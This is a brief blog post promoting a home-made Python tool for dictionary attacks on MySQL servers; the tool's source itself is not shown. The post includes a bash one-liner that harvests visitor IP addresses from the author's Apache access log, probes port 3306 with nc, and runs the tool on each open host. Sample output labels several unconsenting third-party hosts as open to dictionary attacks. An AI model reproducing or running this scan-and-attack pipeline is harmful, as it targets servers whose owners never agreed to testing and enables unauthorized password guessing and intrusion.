After taking a few months to dilly about with python and learn the ins and outs of it to a certain extent, I decided to write a program that does dictionary attacks on mysql.
Plain text:
Tar archive:
MD5Sum: f0e07ca29cc783c6c27f3829f579d37e
The beauty of this program, is that it actually does a test on the remote host and tells you whether or not that the remote host allows remote MySql authentication.
Here’s a quick peek of in action used inside of a bash shell script (IP addresses hidden of course):
:~/for i in $(httplast | egrep -v "${WANIP}||192.168." | awk '{print $1}' | sort | uniq); do nc -z -w1 ${i} 3306; if [[ "$?" == "0" ]]; then ./ -t ${i}; fi; done
Port 3306 on 115.##.##.#1 appears to be open..
A connection has been made and here are the results of the test:
This host does not allow remote administration on MySQL
Port 3306 on 62.##.##.#1 appears to be open..
A connection has been made and here are the results of the test:
This host is open to MySQL dictionary attacks!
Port 3306 on 66.##.##.#1 appears to be open..
A connection has been made and here are the results of the test:
This host is open to MySQL dictionary attacks!
If you’re wondering what the command ‘httplast’ is, let me explain. I’m too lazy to type out: cat /var/log/apache2/access.log , so I created an alias to do handle this for me.
The tool itself, I feel is pretty self explanatory, but if you have any questions feel free to leave a comment or shoot me an e-mail.